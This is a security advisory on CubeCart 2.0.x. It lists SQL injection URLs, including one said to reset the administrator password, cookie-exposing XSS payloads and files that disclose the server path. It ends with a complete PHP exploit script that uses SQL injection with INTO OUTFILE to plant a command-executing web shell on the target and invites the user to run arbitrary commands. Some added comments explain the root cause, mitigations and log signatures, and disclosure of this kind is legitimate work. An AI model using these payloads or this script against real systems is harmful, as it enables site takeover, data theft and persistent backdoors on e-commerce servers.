Hello,
CubeCart: multiple input validation vulnerabilities
Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]
SQL injection
admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
This request resets the administrator's password.
--
admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,
13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
Cross-site scripting (XSS)
admin/print_order.php?order_id=<script>alert(document.cookie);</script>
--
view_order.php?order_id=<script>alert(document.cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.cookie);</script><noscri
pt>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
The other language variables used by this file are affected as well.
--
admin/image.php?image=<script>alert(document.cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.cookie);</
script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie
);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
All other variables in this file are affected as well.
--
footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.cookie);</script
>
All other variables in this file are affected as well.
--
/***************************************/
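Full path disclosure (the exploit below reads the server's installation path from the output of cat_navi.php; the files listed here are reported to reveal it in the same way):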
information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php
/***************************************/
Exploit :-
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X; other versions may also be affected
*/
// Print the banner. The lines inside the quotes that look like comments are
// part of the single-quoted string handed to print_r(), not PHP comments.
print_r('
/**********************************************/
/* CubeCart Remote sql injection exploit */
/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */
/* site: http://www.soqor.net */');
// No target argument given: print the usage text and stop.
if ($argc<2) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host
/* Example: */
/* php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
// Silence PHP error output, remove the execution-time limit (0 = unlimited)
// and make socket operations time out after 5 seconds.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
// Base URL of the target installation, taken from the first command-line
// argument and used below without any validation.
$url=$argv[1];
// First request path. The advisory lists cat_navi.php among the files affected
// by full path disclosure; its output is parsed further down for the path.
$exploit1="/cat_navi.php";
/**
 * Fetch the resource at $url and return its body.
 *
 * Uses file_get_contents() when that function exists; otherwise opens the URL
 * with fopen() and concatenates fread() chunks of up to 1024 bytes.
 *
 * No error handling is performed: the result of a failed request is handed
 * back to the caller unchecked.
 *
 * @param string $url Full URL to request.
 * @return mixed Whatever the fetch produced (the response body on success).
 */
Function get_page($url)
{
if(function_exists("file_get_contents"))
{
$contents = file_get_contents($url);
}
else
{
// Fallback path for PHP builds without file_get_contents().
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
// Step 1 - path disclosure. Request cat_navi.php and take the text that
// follows the second "<b>" in the response, up to the next "</b>".
// NOTE(review): this presumably matches the bold file name in a PHP error
// message, which is only present when the server shows errors to clients
// (display_errors enabled) - confirm against a CubeCart 2.0.x install.
$page = get_page($url.$exploit1);
$pa=explode("<b>",$page);
$pa=explode("</b>",$pa[2]);
// Swap the script name for "soqor.php" to build the path of the file the
// database server will be asked to create.
$path = str_replace("cat_navi.php","",$pa[0])."soqor.php";
// As printed here, $var is a single space with the space removed, i.e. an
// empty string, before being used as the search term for "/".
$var=' ';
$var = str_replace(" ","",$var);
$path = str_replace($var,"/",$path);
// Step 2 - SQL injection in view_doc.php. The view_doc value closes the quoted
// parameter and appends a UNION SELECT ... INTO OUTFILE, so the database server
// writes a row containing PHP code (a system() call on a request parameter) to
// $path.
// Defender notes: the root cause is that view_doc reaches the SQL statement
// unescaped; bound parameters remove the injection. The file write also needs
// the application's database account to hold the FILE privilege and the target
// directory to be writable by the database server, so revoking FILE and setting
// MySQL's secure_file_priv block this step even where the injection remains.
// Detection: view_doc values containing "union", "select" or "into outfile" in
// web logs, and an unexpected soqor.php in the web root.
$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system
(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20f
rom%20store_docs/*";
$page_now = get_page($url.$exploit2);
// Success is inferred from the response mentioning mysql_fetch_array(), i.e.
// from a PHP error message returned to the client. ereg() is the legacy POSIX
// regex function (removed in PHP 7).
if(ereg("mysql_fetch_array()",$page_now))
{
// Report the URL of the file written in step 2.
$newurl=$url."/soqor.php?cmd=id";
Echo "n[+] Go TO ".str_replace("//","/",$newurl)."n[+] Change id to any command you want :)";
}
else
{
Echo "n[-] Exploit Faild";
}
// Print the closing banner and exit.
Die("n/* Visit us : WwW.SoQoR.NeT */n/**********************************************/");
?>
#WwW.SoQoR.NeT